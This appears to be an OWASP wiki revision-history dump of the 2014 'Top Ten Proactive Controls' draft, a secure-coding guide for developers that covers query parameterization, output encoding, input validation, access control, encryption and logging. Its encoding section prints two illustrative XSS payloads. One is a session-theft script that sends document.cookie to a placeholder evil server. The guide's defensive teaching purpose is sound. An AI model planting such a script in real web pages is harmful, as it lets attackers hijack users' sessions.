* Stopping XSS in your web application: OWASP [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]<br />
* General information about injection: [[Top 10 2013-A1-Injection]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_Java_Encoder_Project OWASP Java Encoder Project]<br />
* [https://www.owasp.org/index.php/OWASP_Encoder_Comparison_Reference_Project OWASP Encoder Comparison Reference Project]<br />
<br />
<br />
== 3: Validate All Inputs ==<br />
<br />
It is critical to treat all input from outside of the application (for example, from browsers or mobile clients, from outside systems or files) as untrusted. For web applications this includes HTTP headers, cookies, and GET and POST parameters: any or all of this data could be compromised by an attacker.<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types of input validation: “white list" validation and "black list" validation. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively because it can be bypassed through encoding and other obfuscation techniques, and is not recommended when building a secure web application. The following examples will focus on white list validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation white list of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
'''Key References''' <br />
* [[Input Validation Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_JSON_Sanitizer OWASP JSON Sanitizer Project]<br />
* [https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer OWASP Java HTML Sanitizer Project]<br />
<br />
<br />
== 4: Implement Appropriate Access Controls ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular feature of resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused. Access Control can be a rather complex and design-heavy security control. The following "positive" access control design requirements should be considered at the initial stages of application development. Once you have chosen a specific access control design pattern, it is often difficult and time consuming to re-engineer access control in your application with a new pattern. Access Control is one of the main areas of application security software design that must be heavily thought-through up front. <br />
<br />
=== Force all requests to go through access control checks ===<br />
Most frameworks and languages only check a feature for access control if a programmer adds that check. The opposite is a more security-centric design. Consider using a filter or other automatic mechanism to ensure that all requests go through some kind of access control check.<br />
<br />
=== Deny by default ===<br />
In line with automatic access control checking, consider denying all access control checks for features that have not been configured for access control. Normally the opposite is true in that newly created features automatically grant users full access until a developer has added that check. <br />
<br />
=== Avoid hard-coded policy-based access control checks in code ===<br />
Very often, access control policy is hard-coded deep in application code. This makes auditing or proving the security of that software very difficult and time consuming. Access control policy and application code, when possible, should be separated. Another way of saying this is that your enforcement layer (checks in code) and your access control decision making process (the access control "engine") should be separated when possible. <br />
<br />
=== Code to the activity ===<br />
Most web frameworks use role based access control as the primary method for coding enforcement points in code. While it's acceptable to use roles in access control mechanisms, coding specifically to the role in application code is an anti-pattern. Considering checking if the user has access to that feature in code, as opposed to checking what role the user is in code.<br />
<br />
=== Server-side trusted data should drive access control ===<br />
The vast majority of data you need to make an access control decision (who is the user and are they logged in, what entitlements does the user have, what is the access control policy, what feature and data is being requested, what time is it, what geolocation is it, etc) should be retrieved "server-side" in a standard web or web service application. Policy data such as a users role or an access control rule should never be part of the request. In a standard web application, the only client-side data that is needed for access control is the id or ids of the data being accessed. Most all other data needed to make an access control decision should be retrieved server-side.<br />
<br />
'''Key References'''<br />
* [[Access Control Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/OWASP_PHPRBAC_Project OWASP PHPRBAC Project]<br />
<br />
<br />
== 5: Establish Identity and Authentication Controls ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
'''Key References'''<br />
* [[Authentication Cheat Sheet]]<br />
* [[Password Storage Cheat Sheet]]<br />
* [[Forgot Password Cheat Sheet]] <br />
* [[Session Management Cheat Sheet]]<br />
<br />
<br />
== 6: Protect Data and Privacy ==<br />
<br />
=== Use Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
'''Key References'''<br />
* Proper SSL/TLS configuration: [[Transport Layer Protection Cheat Sheet]]<br />
* Protecting users from man-in-the-middle attacks via fraudulent SSL certificates: [[Pinning Cheat Sheet]]<br />
<br />
=== Use Encryption at Rest ===<br />
<br />
Cryptographic storage is difficult to build securely. It's critical to classify data in your system and determine that data needs to be encrypted, such as the need to encrypt credit cards per the PCI compliance standard. Also, any time you start building your own low-level crypto on your own, ensure you are or have the assistance of a deep applied crypto expert. Consider well vetted cryptographic libraries such as the Google KeyCzar project. Also, be prepared to handle the more difficult aspects of applied crypto such as key management, overall cryptographic architecture design as well as tiering and trust issue in complex software. <br />
<br />
'''Key References'''<br />
* Information on low level decisions necessary when encrypting data at rest: [[Cryptographic Storage Cheat Sheet]] <br />
* [[Password Storage Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/O-Saft OWASP SSL Audit for Testers]<br />
<br />
=== Implement Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
<br />
== 7: Implement Logging and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
The [[OWASP AppSensor Project]] defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. <br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
'''Key References'''<br />
* How to properly implement logging in an application: [[Logging Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [[OWASP AppSensor Project]]<br />
<br />
<br />
== 8: Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* [http://static.springsource.org/spring-security/site/index.html Spring Security]<br />
* [http://shiro.apache.org/ Apache Shiro]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet PHP Security Cheat Sheet]<br />
* [https://www.owasp.org/index.php/.NET_Security_Cheat_Sheet .NET Security Cheat Sheet]<br />
<br />
<br />
== 9: Include Security-Specific Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of any personal or confidential information in the system and make sure that this data is protected. What is the source of the data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it, and is all of this tracked? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
'''Key References'''<br />
* [[OWASP Application Security Verification Standard Project]]<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model]<br />
<br />
<br />
== 10: Design and Architect Security In ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model (OpenSAMM)]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project Application Security Verification Standard Project]<br />
* [https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet Application Security Architecture Cheat Sheet]<br />
* [[Attack Surface Analysis Cheat Sheet]]<br />
* [[Threat Modeling Cheat Sheet]]<br />
<br />
= Formal Numbering =<br />
<br />
* OWASP-C1: Parameterize Queries<br />
* OWASP-C2: Encode Data<br />
* OWASP-C3: Validate All Inputs<br />
* OWASP-C4: Implement Appropriate Access Controls<br />
* OWASP-C5: Establish Identity and Authentication Controls<br />
* OWASP-C6: Protect Data and Privacy<br />
* OWASP-C7: Implement Logging, Error Handling and Intrusion Detection<br />
* OWASP-C8: Leverage Security Features of Frameworks and Security Libraries<br />
* OWASP-C9: Include Security-Specific Requirements<br />
* OWASP-C10: Design and Architect Security In<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! <br />
<br />
== Roadmap ==<br />
<br />
End of April : Complete community review process<br/><br />
End of May : Release final document in well designed PDF form<br />
<br />
== Status ==<br />
<br />
March 10, 2014: We released an early beta of this document to the OWASP leaders list for review and commentary.<br/><br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]] [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]] [[Category:OWASP_Document]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=172313OWASP Proactive Controls2014-04-10T19:31:28Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Proactive-header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. And even when they do, there may be inherent flaws in requirements and designs. When it comes to web security, developers are often set up to lose the security game.<br />
<br />
The OWASP Top Ten Proactive Controls is a list of security techniques that should be included in every software development project. This document was written by developers for developers to assist those new to secure development.<br />
<br />
* 1: Parameterize Queries<br />
* 2: Encode Data<br />
* 3: Validate All Inputs<br />
* 4: Implement Appropriate Access Controls<br />
* 5: Establish Identity and Authentication Controls<br />
* 6: Protect Data and Privacy<br />
* 7: Implement Logging, Error Handling and Intrusion Detection<br />
* 8: Leverage Security Features of Frameworks and Security Libraries<br />
* 9: Include Security-Specific Requirements<br />
* 10: Design and Architect Security In<br />
<br />
For more information, see the [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls complete document here].<br />
<br />
==Licensing==<br />
<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is This? ==<br />
<br />
The OWASP Top Ten Proactive Controls describes the top control and control categories that every architect and developer should absolutely, 100% include in every project.<br />
<br />
== Project Leaders ==<br />
<br />
* [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]<br />
* [https://www.owasp.org/index.php/User:Jim_Bird Jim Bird] [mailto:jimbird@shaw.ca @]<br />
<br />
== Key Contributors ==<br />
<br />
* Danny Harris [mailto:danny.harris@owasp.org @]<br />
* Stephen de Vries<br />
* Andrew Van Der Stock<br />
* Gaz Heyes<br />
* Colin Watson<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== Quick Access ==<br />
<br />
* Top Ten Proactive Controls 2014 [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls full description].<br />
<br />
== News and Events ==<br />
* [10 Mar 2014] [http://lists.owasp.org/pipermail/owasp-leaders/2014-March/011047.html Request for review]<br />
* [04 Feb 2014] New Wiki Template!<br />
<br />
== Mailing List ==<br />
<br />
Keep up-to-date via the [https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List].<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten Proactive Controls 2014. <br />
<br />
== 1: Parameterize Queries ==<br />
<br />
SQL Injection is perhaps one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of query parameterization Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
<br />
'''Key References'''<br />
* [[Query Parameterization Cheat Sheet]]<br />
* https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide<br />
<br />
<br />
<br />
== 2: Encode Data ==<br />
<br />
Encoding is a powerful mechanism to help protect against many types of attack, especially injection attacks. Essentially, encoding involves translating special characters into some equivalent that is no longer significant in the target interpreter. A specific example of encoding is output encoding necessary to Cross Site Scripting. Web developers often build web pages dynamically, consisting of a mix of developer built HTML/JavaScript and database data that was originally populated with user input. This input should often be considered to be untrusted data and dangerous, which requires special handling when building a secure web application. Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in users browsers and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML. Forms of encoding needing to stop XSS include HTML Entity Encoding, JavaScript Encoding and Percent Encoding (aka URL Encoding). Encoding needed to stop other forms of injection include unix encoding, windows encoding, LDAP encoding, XML encoding and others.<br />
<br />
'''Key References'''<br />
* Stopping XSS in your web application: OWASP [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]<br />
* General information about injection: [[Top 10 2013-A1-Injection]]<br />
<br />
'''Key Tools'''<br />
* https://www.owasp.org/index.php/OWASP_Java_Encoder_Project<br />
* https://www.owasp.org/index.php/Category:OWASP_EnDe<br />
* https://www.owasp.org/index.php/OWASP_Encoder_Comparison_Reference_Project<br />
<br />
<br />
== 3: Validate All Inputs ==<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types on input validation: “White list validation and blacklist validation”. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively and is not often suggested when initially building a secure web application. The following examples will focus on whitelist validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Also, it's critical to treat all client side data as untrusted. (we need to expand on this)<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation whitelist of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
'''Key References''' <br />
* https://www.owasp.org/index.php/Input_Validation_Cheat_Sheet<br />
<br />
'''Key Tools'''<br />
* https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project<br />
* https://www.owasp.org/index.php/OWASP_JSON_Sanitizer<br />
* https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer<br />
* https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API<br />
* https://www.owasp.org/index.php/OWASP_EJSF_Project<br />
<br />
<br />
== 4: Implement Appropriate Access Controls ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular feature of resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused. Access Control can be a rather complex and design-heavy security control. The following "positive" access control design requirements should be considered at the initial stages of application development. Once you have chosen a specific access control design pattern, it is often difficult and time consuming to re-engineer access control in your application with a new pattern. Access Control is one of the main areas of application security software design that must be heavily thought-through up front. <br />
<br />
=== Force all requests to go through access control checks ===<br />
Most frameworks and languages only check a feature for access control if a programmer adds that check. The opposite is a more security-centric design. Consider using a filter or other automatic mechanism to ensure that all requests go through some kind of access control check.<br />
<br />
=== Deny by default ===<br />
In line with automatic access control checking, consider denying all access control checks for features that have not been configured for access control. Normally the opposite is true in that newly created features automatically grant users full access until a developer has added that check. <br />
<br />
=== Avoid hard-coded policy-based access control checks in code ===<br />
Very often, access control policy is hard-coded deep in application code. This makes auditing or proving the security of that software very difficult and time consuming. Access control policy and application code, when possible, should be separated. Another way of saying this is that your enforcement layer (checks in code) and your access control decision making process (the access control "engine") should be separated when possible. <br />
<br />
=== Code to the activity ===<br />
Most web frameworks use role based access control as the primary method for coding enforcement points in code. While it's acceptable to use roles in access control mechanisms, coding specifically to the role in application code is an anti-pattern. Considering checking if the user has access to that feature in code, as opposed to checking what role the user is in code.<br />
<br />
=== Server-side trusted data should drive access control ===<br />
The vast majority of data you need to make an access control decision (who is the user and are they logged in, what entitlements does the user have, what is the access control policy, what feature and data is being requested, what time is it, what geolocation is it, etc) should be retrieved "server-side" in a standard web or web service application. Policy data such as a users role or an access control rule should never be part of the request. In a standard web application, the only client-side data that is needed for access control is the id or ids of the data being accessed. Most all other data needed to make an access control decision should be retrieved server-side.<br />
<br />
'''Key References'''<br />
* [[Access Control Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* https://www.owasp.org/index.php/OWASP_PHPRBAC_Project<br />
<br />
<br />
== 5: Establish Identity and Authentication Controls ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
'''Key References'''<br />
* [[Authentication Cheat Sheet]]<br />
* [[Password Storage Cheat Sheet]]<br />
* [[Forgot Password Cheat Sheet]] <br />
* [[Session Management Cheat Sheet]]<br />
<br />
<br />
== 6: Protect Data and Privacy ==<br />
<br />
=== Use Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
'''Key References'''<br />
* Proper SSL/TLS configuration: [[Transport Layer Protection Cheat Sheet]]<br />
* Protecting users from man-in-the-middle attacks via fraudulent SSL certificates: [[Pinning Cheat Sheet]]<br />
<br />
=== Use Encryption at Rest ===<br />
<br />
Cryptographic storage is difficult to build securely. It's critical to classify data in your system and determine that data needs to be encrypted, such as the need to encrypt credit cards per the PCI compliance standard. Also, any time you start building your own low-level crypto on your own, ensure you are or have the assistance of a deep applied crypto expert. Consider well vetted cryptographic libraries such as the Google KeyCzar project. Also, be prepared to handle the more difficult aspects of applied crypto such as key management, overall cryptographic architecture design as well as tiering and trust issue in complex software. <br />
<br />
'''Key References'''<br />
* Information on low level decisions necessary when encrypting data at rest: [[Cryptographic Storage Cheat Sheet]] <br />
* [[Password Storage Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* https://www.owasp.org/index.php/O-Saft<br />
<br />
=== Implement Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
<br />
== 7: Implement Logging, Error Handling and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
The [[OWASP AppSensor Project]] defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. <br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
'''Key References'''<br />
* How to properly implement logging in an application: [[Logging Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [[OWASP AppSensor Project]]<br />
<br />
<br />
== 8: Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
